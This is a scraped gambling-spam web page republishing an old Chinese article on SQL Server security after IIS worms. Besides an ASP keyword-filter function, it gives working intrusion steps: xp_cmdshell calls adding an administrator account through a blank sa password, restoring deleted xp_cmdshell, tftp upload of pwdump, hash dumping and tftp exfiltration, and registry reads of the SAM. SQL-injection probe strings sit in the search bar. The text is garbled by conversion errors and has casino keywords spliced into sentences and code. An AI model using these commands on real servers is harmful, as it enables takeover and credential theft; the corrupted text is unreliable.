建体彩网|中彩网双色球连号|
?
快捷搜索:  as  test  1111  test aNd 8=8  test++aNd+8=8  as++aNd+8=8  as aNd 8=8

網賭新浦金可靠嗎:調整重心 從IIS到SQL Server數據庫安全(1)SQL Server數據庫

?

從Codered到Nimda等,一大年夜堆蠕蟲把原本必要人工使用的破綻都變成了法度榜樣自動使用了,大年夜家還想去手工操作這些IIS破綻么?讓我們調劑重心,去看看辦事器常用的數據庫吧。

一樣平常網站都是基于數據庫的,分外是ASP、PHP、JSP這樣的用數據庫來動態顯示的網站。很多網站可能多留意的是操作系統的破綻,然則對數據庫和這些腳本的安然老是輕忽,也沒有太多留意。

該文章對從SQL腳本問題說得異常具體。對付腳本安然的辦理,也可以經由過程過濾來實現,可以參考我曩昔寫的。對付ASP來說,可以應用下面這個過濾函數:

Function Filter_SQL(strData)

Dim strFilter

Dim blnFlag

Dim i

strFilter="',;,//,--,@,_,exec,declare"

'必要過濾的字符,可以自己添加,","是分隔符

blnFlag=Flase'過濾標志,假如孕育發生過濾,那么便是真

Dim array網賭新浦金可靠嗎Filter

arrayFilter=Split(strFilter,",")

For i=0 To UBound(arrayFilter)

If Instr(strData,arrayFilter(i))>0 Then

blnFlag=True

Exit For

End If

Next

If blnFlag Then

Response.Redirect "wrong.asp"

'當發明有過濾操作時,導向一個預定頁面。

反正正常造訪用不到的連接哀求,總不是好工作。

Else

Filter_SQL=strData

End If

End Function

對付SQL Server數據庫來說,安然問題不僅僅局限在腳本上了。微軟的系統性很強,全部基于Windows系統的利用都有很強的關聯性,對SQL Server來說,基礎可以把數據庫治理和系統治理等同起來了。SQL Server默認的治理員賬號“sa”的密碼是空的,這給多半NT辦事器孕育發生一個安然破綻。“SQLRCMD”,就能夠使用得到的數據庫治理員賬號履行系統敕令。

在SQL Server中有很多系統存儲歷程,有些是數據庫內部應用的,還有一些便是經由過程履行存儲歷程來調用系統敕令。

系統存儲歷程:xp_cmdshell。

便因此操作系統敕令行說冥器的要領履行給定的敕令字符串。它就詳細語法是:

xp_cmdshell {'command_string'} [, no_output]

xp_cmdshell在默認環境下,只有 sysadmin 的成員才能履行。然則,sysadmin也可以賦予其他用戶這個履行權限。在早期版本中,得到 xp_cmdshell 履行權限的用戶在 SQL Server 辦事的用戶帳戶中運行敕令。可以經由過程設置設置設備擺設擺設選項設置設置設備擺設擺設 SQL Server,以便對 SQL Server 無 sa 造訪權限的用戶能夠在SQLExecutiveCmdExec Windows NT 帳戶中運行 xp_cmdshell。在 SQL Server 7.0 中,該賬戶稱為 SQLAgentCmdExec。現在對付SQL Server2000,只要有一個能履行該存儲歷程的賬號就可以直接運行敕令了。

對付 NT 和 WIN2000,當用戶不是 sysadmin 組的成員時,xp_cmdshell 將模擬應用 xp_sqlagent_proxy_account 指定的 SQL 網賭新浦金可靠嗎Server 代理法度榜樣的代理帳戶。假如代理帳戶不能用,則 xp_cmdshell 將掉敗。以是縱然有一個帳戶是master數據庫的db_owner,也不能履行這個存儲歷程。網賭新浦金可靠嗎

假如我們有一個能履行xp_cmdshell的數據庫賬號,比如是空口令的sa賬號。那么我們可以履行這樣的敕令:

exec xp_cmdshell 'net user refdom 123456 /add'

exec xp_cmdshell 'net localgroup administrators refdom /add'

上面兩次調用就在系統的治理員組中添加了一個用戶:refdom

當我們得到數據庫的sa治理員賬號后,就應該可以完全節制這個機械了。可見數據庫安然的緊張性。

下面這些存儲歷程都是對Public可以履行的:

Use master

Select sysobjects.name From sysobjects, sysprotects

Wher網賭新浦金可靠嗎e sysprotects.uid = 0 AND xtype IN ('X','P') A

ND sysobjects.id = sysprotects.id

加強數據庫的安然是異常緊張的,有的數據庫辦事器是和WEB辦事器隔脫離的,這就同MAIL辦事器一樣,數據庫的日志可能就基礎很少去查看,這將會成為治理員的一個紕漏點。類似DNS、MAIL等等,數據庫辦事器每每成為各類入侵的跳板。

辦理數據庫的問題和技術:

1、得到SA權限后,卻不能履行xp_cmdshell存儲歷程怎么辦?

答:可能是已經把xp_cmdshell等擴展存儲歷程刪除了,可以用這個存儲歷程把xp_cmdshell規復sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'。

2、經由過程數據庫用pwdump得到系統治理員密碼:

先上傳一個pwdump:

tftp -i GET pwdump3.exe pwdump3.exe

tftp -網賭新浦金可靠嗎i GET lsaext.dll lsaext.dll

tftp -i GET pwservice.exe pwservice.exe

pwdump3 127.0.0.1 outfile.txt

tftp PUT outfile.txt outfile.txt

然后再用解密對象l0pht等等破解這些密碼。

3、從數據庫讀取系統治理員密碼:

能讀出加密的密碼是NT的“administrator”賬號也不能做的,SQL Server能讀出來是應用的“LocalSystem”賬號,這個賬號比administrator更高一級。可以應用下面這個存儲歷程。不過讀出來的密碼是顛末加密后的,然后再解密:

xp_regread 'HKEY_LOCAL_MACHINE','SECURITYSAMDomainsAccount','F'

免責聲明:以上內容源自網絡,版權歸原作者所有,如有侵犯您的原創版權請告知,我們將盡快刪除相關內容。

您可能還會對下面的文章感興趣:

建体彩网
温州麻将手机版下载 体彩七星彩预测 重庆麻将倒倒胡游戏规则 广西快乐十分走垫图非凡 七乐彩走势图中奖查询 2008奥运会足球比分 彩票大赢家网址 广西快乐十分开奖控股 山西11选5任选五技巧 秒速飞艇